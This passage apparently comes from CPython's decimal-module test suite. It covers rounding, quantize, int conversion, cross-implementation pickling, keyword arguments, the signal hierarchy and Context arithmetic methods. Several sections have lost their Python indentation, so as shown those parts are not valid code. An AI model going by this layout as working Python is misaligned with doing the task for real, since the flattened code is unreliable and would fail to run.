            ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
            self.assertEqual(ans, '2')
            c.clear_flags()
            self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.rounding = ROUND_UP
            ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
            self.assertEqual(ans, '1.501')
            c.rounding = ROUND_DOWN
            ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
            self.assertEqual(ans, '1.500')
            ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
            self.assertEqual(ans, '1.501')
            c.clear_flags()
            self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
            self.assertTrue(c.flags[InvalidOperation])

        # localcontext(ctx=None) must copy the current context
        with localcontext(Context()) as context:
            context.prec = 7
            context.Emax = 999
            context.Emin = -999
            with localcontext(ctx=None) as c:
                self.assertEqual(c.prec, 7)
                self.assertEqual(c.Emax, 999)
                self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
    # Run the shared usability tests against the C implementation
    # (_decimal); C is set at module level.
    decimal = C
class PyUsabilityTest(UsabilityTest):
    # Run the shared usability tests against the pure-Python
    # implementation (_pydecimal); P is set at module level.
    decimal = P
class PythonAPItests(unittest.TestCase):
    """Python-level API tests run against both decimal implementations.

    Concrete subclasses (CPythonAPItests / PyPythonAPItests) set the
    ``decimal`` class attribute to the C or pure-Python module.
    """

    def test_abc(self):
        # Decimal registers as a numbers.Number but deliberately not as
        # a numbers.Real.
        Decimal = self.decimal.Decimal
        self.assertTrue(issubclass(Decimal, numbers.Number))
        self.assertFalse(issubclass(Decimal, numbers.Real))
        self.assertIsInstance(Decimal(0), numbers.Number)
        self.assertNotIsInstance(Decimal(0), numbers.Real)

    def test_pickle(self):
        # Decimal and DecimalTuple must round-trip under every pickle
        # protocol, and pickles must be interchangeable between the C
        # and Python implementations (a dump made while one module is
        # installed as sys.modules['decimal'] loads as the other's type).
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            Decimal = self.decimal.Decimal
            savedecimal = sys.modules['decimal']

            # Round trip
            sys.modules['decimal'] = self.decimal
            d = Decimal('-3.141590000')
            p = pickle.dumps(d, proto)
            e = pickle.loads(p)
            self.assertEqual(d, e)

            if C:
                # Test interchangeability
                x = C.Decimal('-3.123e81723')
                y = P.Decimal('-3.123e81723')

                sys.modules['decimal'] = C
                sx = pickle.dumps(x, proto)
                sys.modules['decimal'] = P
                r = pickle.loads(sx)
                self.assertIsInstance(r, P.Decimal)
                self.assertEqual(r, y)

                sys.modules['decimal'] = P
                sy = pickle.dumps(y, proto)
                sys.modules['decimal'] = C
                r = pickle.loads(sy)
                self.assertIsInstance(r, C.Decimal)
                self.assertEqual(r, x)

                # The same interchangeability must hold for DecimalTuple.
                x = C.Decimal('-3.123e81723').as_tuple()
                y = P.Decimal('-3.123e81723').as_tuple()

                sys.modules['decimal'] = C
                sx = pickle.dumps(x, proto)
                sys.modules['decimal'] = P
                r = pickle.loads(sx)
                self.assertIsInstance(r, P.DecimalTuple)
                self.assertEqual(r, y)

                sys.modules['decimal'] = P
                sy = pickle.dumps(y, proto)
                sys.modules['decimal'] = C
                r = pickle.loads(sy)
                self.assertIsInstance(r, C.DecimalTuple)
                self.assertEqual(r, x)

            sys.modules['decimal'] = savedecimal

    def test_int(self):
        # int(Decimal) truncates toward zero (like float) and rejects
        # NaNs (ValueError) and infinities (OverflowError).
        Decimal = self.decimal.Decimal

        for x in range(-250, 250):
            s = '%0.2f' % (x / 100.0)
            # should work the same as for floats
            self.assertEqual(int(Decimal(s)), int(float(s)))
            # should work the same as to_integral in the ROUND_DOWN mode
            d = Decimal(s)
            r = d.to_integral(ROUND_DOWN)
            self.assertEqual(Decimal(int(d)), r)

        self.assertRaises(ValueError, int, Decimal('-nan'))
        self.assertRaises(ValueError, int, Decimal('snan'))
        self.assertRaises(OverflowError, int, Decimal('inf'))
        self.assertRaises(OverflowError, int, Decimal('-inf'))

    def test_trunc(self):
        # math.trunc must behave exactly like int(): truncation toward
        # zero, i.e. to_integral with ROUND_DOWN.
        Decimal = self.decimal.Decimal

        for x in range(-250, 250):
            s = '%0.2f' % (x / 100.0)
            # should work the same as for floats
            self.assertEqual(int(Decimal(s)), int(float(s)))
            # should work the same as to_integral in the ROUND_DOWN mode
            d = Decimal(s)
            r = d.to_integral(ROUND_DOWN)
            self.assertEqual(Decimal(math.trunc(d)), r)

    def test_from_float(self):
        # from_float converts floats exactly, honours subclasses
        # (including calling their __init__), accepts ints, handles
        # NaN/Inf, and rejects non-numeric input.
        Decimal = self.decimal.Decimal

        class MyDecimal(Decimal):
            def __init__(self, _):
                self.x = 'y'

        self.assertTrue(issubclass(MyDecimal, Decimal))

        r = MyDecimal.from_float(0.1)
        self.assertEqual(type(r), MyDecimal)
        self.assertEqual(str(r),
                '0.1000000000000000055511151231257827021181583404541015625')
        self.assertEqual(r.x, 'y')

        bigint = 12345678901234567890123456789
        self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
        self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
        self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
        self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
        self.assertEqual(str(MyDecimal.from_float(float('nan'))),
                         str(Decimal('NaN')))
        self.assertEqual(str(MyDecimal.from_float(float('inf'))),
                         str(Decimal('Infinity')))
        self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
                         str(Decimal('-Infinity')))
        self.assertRaises(TypeError, MyDecimal.from_float, 'abc')

        # Conversion is exact, so float -> Decimal -> float round-trips.
        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(MyDecimal.from_float(x)))  # roundtrip

    def test_create_decimal_from_float(self):
        # Unlike from_float, the context method rounds the result to the
        # context precision and can therefore signal Inexact.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact

        context = Context(prec=5, rounding=ROUND_DOWN)
        self.assertEqual(
            context.create_decimal_from_float(math.pi),
            Decimal('3.1415')
        )
        context = Context(prec=5, rounding=ROUND_UP)
        self.assertEqual(
            context.create_decimal_from_float(math.pi),
            Decimal('3.1416')
        )
        context = Context(prec=5, traps=[Inexact])
        self.assertRaises(
            Inexact,
            context.create_decimal_from_float,
            math.pi
        )
        # Sign of a negative zero and exactness of small values survive.
        self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
                         "Decimal('-0')")
        self.assertEqual(repr(context.create_decimal_from_float(1.0)),
                         "Decimal('1')")
        self.assertEqual(repr(context.create_decimal_from_float(10)),
                         "Decimal('10')")

    def test_quantize(self):
        # quantize honours an explicit rounding argument and an explicit
        # context, signalling InvalidOperation when the target exponent
        # is out of the context's range.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        InvalidOperation = self.decimal.InvalidOperation

        c = Context(Emax=99999, Emin=-99999)
        self.assertEqual(
            Decimal('7.335').quantize(Decimal('.01')),
            Decimal('7.34')
        )
        self.assertEqual(
            Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
            Decimal('7.33')
        )
        self.assertRaises(
            InvalidOperation,
            Decimal("10e99999").quantize, Decimal('1e100000'), context=c
        )

        c = Context()
        d = Decimal("0.871831e800")
        # exp, rounding and context may all be passed by keyword.
        x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
        self.assertEqual(x, Decimal('8.71E+799'))

    def test_complex(self):
        # Decimal supports the complex protocol: real is the value
        # itself, imag is 0, and the attributes are read-only.
        Decimal = self.decimal.Decimal

        x = Decimal("9.8182731e181273")
        self.assertEqual(x.real, x)
        self.assertEqual(x.imag, 0)
        self.assertEqual(x.conjugate(), x)

        x = Decimal("1")
        self.assertEqual(complex(x), complex(float(1)))

        self.assertRaises(AttributeError, setattr, x, 'real', 100)
        self.assertRaises(AttributeError, setattr, x, 'imag', 100)
        self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
        self.assertRaises(AttributeError, setattr, x, '__complex__', 100)

    def test_named_parameters(self):
        # Every Decimal method that takes a context (and other operands)
        # must accept them as keyword arguments; operations must use the
        # explicitly supplied context xc and leave the ambient context c
        # untouched (flags are checked on both).
        D = self.decimal.Decimal
        Context = self.decimal.Context
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation
        Overflow = self.decimal.Overflow

        # Tiny context so one-digit results and overflow are easy to hit.
        xc = Context()
        xc.prec = 1
        xc.Emax = 1
        xc.Emin = -1

        with localcontext() as c:
            c.clear_flags()

            self.assertEqual(D(9, xc), 9)
            self.assertEqual(D(9, context=xc), 9)
            self.assertEqual(D(context=xc, value=9), 9)
            self.assertEqual(D(context=xc), 0)
            xc.clear_flags()
            self.assertRaises(InvalidOperation, D, "xyz", context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])

            xc.clear_flags()
            self.assertEqual(D(2).exp(context=xc), 7)
            self.assertRaises(Overflow, D(8).exp, context=xc)
            self.assertTrue(xc.flags[Overflow])
            self.assertFalse(c.flags[Overflow])

            xc.clear_flags()
            self.assertEqual(D(2).ln(context=xc), D('0.7'))
            self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])

            self.assertEqual(D(0).log10(context=xc), D('-inf'))
            self.assertEqual(D(-1).next_minus(context=xc), -2)
            self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
            self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
            self.assertEqual(D("9999").to_integral(context=xc), 9999)
            self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
            self.assertEqual(D("123").to_integral_value(context=xc), 123)
            self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))

            self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
            xc.clear_flags()
            self.assertRaises(InvalidOperation,
                              D("0").compare_signal, D('nan'), context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])
            self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
            self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
            self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
                             D('-0.3'))
            self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
            self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
                             D('0.0'))
            self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
            xc.clear_flags()
            self.assertRaises(InvalidOperation,
                              D("0.2").quantize, D('1e10'), context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])
            self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
                             D('-0.5'))

            self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
                             D('7E+1'))

            # Boolean predicates and structural helpers take no context.
            self.assertRaises(TypeError, D(1).is_canonical, context=xc)
            self.assertRaises(TypeError, D(1).is_finite, context=xc)
            self.assertRaises(TypeError, D(1).is_infinite, context=xc)
            self.assertRaises(TypeError, D(1).is_nan, context=xc)
            self.assertRaises(TypeError, D(1).is_qnan, context=xc)
            self.assertRaises(TypeError, D(1).is_snan, context=xc)
            self.assertRaises(TypeError, D(1).is_signed, context=xc)
            self.assertRaises(TypeError, D(1).is_zero, context=xc)

            self.assertFalse(D("0.01").is_normal(context=xc))
            self.assertTrue(D("0.01").is_subnormal(context=xc))

            self.assertRaises(TypeError, D(1).adjusted, context=xc)
            self.assertRaises(TypeError, D(1).conjugate, context=xc)
            self.assertRaises(TypeError, D(1).radix, context=xc)

            self.assertEqual(D(-111).logb(context=xc), 2)
            self.assertEqual(D(0).logical_invert(context=xc), 1)
            self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
            self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')

            self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
            self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
            self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)

            self.assertEqual(D('23').rotate(1, context=xc), 3)
            self.assertEqual(D('23').rotate(1, context=xc), 3)
            xc.clear_flags()
            self.assertRaises(Overflow,
                              D('23').scaleb, 1, context=xc)
            self.assertTrue(xc.flags[Overflow])
            self.assertFalse(c.flags[Overflow])
            self.assertEqual(D('23').shift(-1, context=xc), 0)

            self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
            self.assertRaises(TypeError, D(0).as_tuple, context=xc)
            self.assertEqual(D(1).canonical(), 1)
            self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
            self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
            self.assertRaises(TypeError, D(1).canonical, context="x")
            self.assertRaises(TypeError, D(1).canonical, xyz="x")

    def test_exception_hierarchy(self):
        # The signal classes form the documented hierarchy rooted at
        # DecimalException (an ArithmeticError), with the expected extra
        # bases (TypeError for FloatOperation, ZeroDivisionError for
        # DivisionByZero/DivisionUndefined) mixed in.
        decimal = self.decimal
        DecimalException = decimal.DecimalException
        InvalidOperation = decimal.InvalidOperation
        FloatOperation = decimal.FloatOperation
        DivisionByZero = decimal.DivisionByZero
        Overflow = decimal.Overflow
        Underflow = decimal.Underflow
        Subnormal = decimal.Subnormal
        Inexact = decimal.Inexact
        Rounded = decimal.Rounded
        Clamped = decimal.Clamped

        self.assertTrue(issubclass(DecimalException, ArithmeticError))

        self.assertTrue(issubclass(InvalidOperation, DecimalException))
        self.assertTrue(issubclass(FloatOperation, DecimalException))
        self.assertTrue(issubclass(FloatOperation, TypeError))
        self.assertTrue(issubclass(DivisionByZero, DecimalException))
        self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
        self.assertTrue(issubclass(Overflow, Rounded))
        self.assertTrue(issubclass(Overflow, Inexact))
        self.assertTrue(issubclass(Overflow, DecimalException))
        self.assertTrue(issubclass(Underflow, Inexact))
        self.assertTrue(issubclass(Underflow, Rounded))
        self.assertTrue(issubclass(Underflow, Subnormal))
        self.assertTrue(issubclass(Underflow, DecimalException))
        self.assertTrue(issubclass(Subnormal, DecimalException))
        self.assertTrue(issubclass(Inexact, DecimalException))
        self.assertTrue(issubclass(Rounded, DecimalException))
        self.assertTrue(issubclass(Clamped, DecimalException))

        self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
        self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
    # Run the shared Python-API tests against the C implementation.
    decimal = C
class PyPythonAPItests(PythonAPItests):
    # Run the shared Python-API tests against the pure-Python implementation.
    decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
    """Passing None for every Context argument must yield the defaults."""
    mod = self.decimal
    default = mod.Context()
    all_none = mod.Context(prec=None, rounding=None, Emax=None, Emin=None,
                           capitals=None, clamp=None, flags=None, traps=None)
    for ctx in (default, all_none):
        # Scalar attributes take their documented default values.
        for attr, want in (('prec', 28),
                           ('rounding', ROUND_HALF_EVEN),
                           ('Emax', 999999),
                           ('Emin', -999999),
                           ('capitals', 1),
                           ('clamp', 0)):
            self.assertEqual(getattr(ctx, attr), want)
        # No flags set; only the three default traps enabled.
        assert_signals(self, ctx, 'flags', [])
        assert_signals(self, ctx, 'traps',
                       [mod.InvalidOperation, mod.DivisionByZero,
                        mod.Overflow])
@cpython_only
def test_from_legacy_strings(self):
    # Context.rounding must accept legacy (non-compact) unicode string
    # objects naming a rounding mode, while rejecting the empty string
    # and strings containing embedded NUL characters.
    import _testcapi
    c = self.decimal.Context()

    for rnd in RoundingModes:
        c.rounding = _testcapi.unicode_legacy_string(rnd)
        self.assertEqual(c.rounding, rnd)

    s = _testcapi.unicode_legacy_string('')
    self.assertRaises(TypeError, setattr, c, 'rounding', s)

    s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
    self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
    # Contexts must round-trip under every pickle protocol, and context
    # pickles must be interchangeable between the C and Python
    # implementations: a context dumped while one module is installed
    # as sys.modules['decimal'] must load as the other module's Context
    # with every attribute preserved.
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        Context = self.decimal.Context

        savedecimal = sys.modules['decimal']

        # Round trip
        sys.modules['decimal'] = self.decimal
        c = Context()
        e = pickle.loads(pickle.dumps(c, proto))

        self.assertEqual(c.prec, e.prec)
        self.assertEqual(c.Emin, e.Emin)
        self.assertEqual(c.Emax, e.Emax)
        self.assertEqual(c.rounding, e.rounding)
        self.assertEqual(c.capitals, e.capitals)
        self.assertEqual(c.clamp, e.clamp)
        self.assertEqual(c.flags, e.flags)
        self.assertEqual(c.traps, e.traps)

        # Test interchangeability
        combinations = [(C, P), (P, C)] if C else [(P, P)]
        for dumper, loader in combinations:
            # Sweep rounding modes and growing prefixes of the signal
            # lists for both flags and traps.
            for ri, _ in enumerate(RoundingModes):
                for fi, _ in enumerate(OrderedSignals[dumper]):
                    for ti, _ in enumerate(OrderedSignals[dumper]):

                        prec = random.randrange(1, 100)
                        emin = random.randrange(-100, 0)
                        emax = random.randrange(1, 100)
                        caps = random.randrange(2)
                        clamp = random.randrange(2)

                        # One module dumps
                        sys.modules['decimal'] = dumper
                        c = dumper.Context(
                            prec=prec, Emin=emin, Emax=emax,
                            rounding=RoundingModes[ri],
                            capitals=caps, clamp=clamp,
                            flags=OrderedSignals[dumper][:fi],
                            traps=OrderedSignals[dumper][:ti]
                        )
                        s = pickle.dumps(c, proto)

                        # The other module loads
                        sys.modules['decimal'] = loader
                        d = pickle.loads(s)
                        self.assertIsInstance(d, loader.Context)

                        self.assertEqual(d.prec, prec)
                        self.assertEqual(d.Emin, emin)
                        self.assertEqual(d.Emax, emax)
                        self.assertEqual(d.rounding, RoundingModes[ri])
                        self.assertEqual(d.capitals, caps)
                        self.assertEqual(d.clamp, clamp)
                        assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
                        assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])

        sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
